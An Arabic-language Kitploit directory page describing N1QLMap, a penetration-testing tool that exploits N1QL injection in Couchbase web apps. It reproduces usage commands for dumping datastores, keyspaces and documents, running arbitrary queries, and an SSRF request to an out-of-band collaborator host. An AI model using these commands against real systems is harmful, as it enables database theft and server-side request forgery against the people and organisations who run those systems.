Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
N1QLMap — الأداة تستخرج البيانات من قاعدة بيانات Couchbase عن طريق استغلال ثغرات حقن N1QL. | Kitploit
أدوات/GitHubGitHub/fsecurelabs/n1qlmap
استغلال تطبيقات الويبتسريب البياناتاختبار الاختراقأمن قواعد البيانات
GitHubfsecurelabs/n1qlmap

N1QLMap

الأداة تستخرج البيانات من قاعدة بيانات Couchbase عن طريق استغلال ثغرات حقن N1QL.

عرض المستودع
751412منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الوصف

N1QLMap هو أداة استغلال N1QL. تعمل حالياً مع قاعدة بيانات Couchbase. تدعم الأداة استخراج البيانات وتنفيذ هجمات SSRF عبر CURL. يمكن العثور على مزيد من المعلومات هنا: https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database.

الاستخدام

المساعدة

root@kitploit:~
usage: n1qlMap.py [-h] [-r REQUEST] [-k KEYWORD] [--proxy PROXY] [--validatecerts] [-v]
                  (-d | -ks DATASTORE_URL | -e KEYSPACE_ID | -q QUERY | -c [ENDPOINT [OPTIONS ...]])
                  host

positional arguments:
  host                  Host used to send an HTTP request e.g. https://vulndomain.net

optional arguments:
  -h, --help            show this help message and exit
  -r REQUEST, --request REQUEST
                        Path to an HTTP request
  -k KEYWORD, --keyword KEYWORD
                        Keyword that exists in HTTP response when query is successful
  --proxy PROXY         Proxy server address
  --validatecerts       Set the flag to enforce certificate validation. Certificates are not validated by default!
  -v, --verbose_debug   Set the verbosity level to debug
  -d, --datastores      Lists available datastores
  -ks DATASTORE_URL, --keyspaces DATASTORE_URL
                        Lists available keyspaces for specific datastore URL
  -e KEYSPACE_ID, --extract KEYSPACE_ID
                        Extracts data from a specific keyspace
  -q QUERY, --query QUERY
                        Run arbitrary N1QL query
  -c [ENDPOINT [OPTIONS ...]], --curl [ENDPOINT [OPTIONS ...]]
                        Runs CURL N1QL function inside the query, can be used to SSRF

الاستخدام

  1. ضع طلب HTTP في ملف request.txt. قم بتمييز نقطة الحقن باستخدام *i*. راجع ملف example_request_1.txt كمرجع.
  2. استخدم أحد الأوامر التالية.

استخراج مخازن البيانات:

root@kitploit:~
$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --datastores

استخراج مساحات المفاتيح من معرّف مخزن البيانات المحدد:

root@kitploit:~
$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --keyspaces "http://127.0.0.1:8091"

استخراج جميع المستندات من مساحة المفاتيح المعطاة:

root@kitploit:~
$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --extract travel-sample

تشغيل استعلام مخصص:

root@kitploit:~
$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --query 'SELECT * FROM `travel-sample` AS T ORDER by META(T).id LIMIT 1'

تنفيذ طلب CURL / SSRF:

root@kitploit:~
$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --curl *************j3mrt7xy3pre.burpcollaborator.net "{'request':'POST','data':'data','header':['User-Agent: Agent Smith']}"

العرض التوضيحي

للعب مع الثغرة، يمكنك تشغيل أجهزة Docker مع تطبيق ويب Couchbase و NodeJS. إذا كنت قد استوفيت المتطلبات بالفعل، قم بتشغيل:

root@kitploit:~
cd n1ql-demo
./quick_setup.sh

الآن، يمكنك تشغيل الأوامر الموصوفة في قسم الاستخدام ضد تطبيق الويب الذي يعمل في Docker.

المتطلبات

لا يحتاج سكربت N1QLMap.py إلى أي متطلبات محددة بخلاف Python 3.

المتطلبات التالية مخصصة فقط للعرض التوضيحي المقدم في مجلد n1ql-demo.

  • Docker
  • Docker Compose

لتثبيت Docker و Docker Compose على Kali:

root@kitploit:~
# Docker Installation
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' > /etc/apt/sources.list.d/docker.list
apt-get update

apt-get remove docker docker-engine docker.io
apt-get install docker-ce

# Start Docker Service
systemctl start docker

# Docker Compose Installation
sudo curl -L "https://github.com/docker/compose/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose

دعنا نختبر Docker:

root@kitploit:~
docker run hello-world
تنزيل الأداة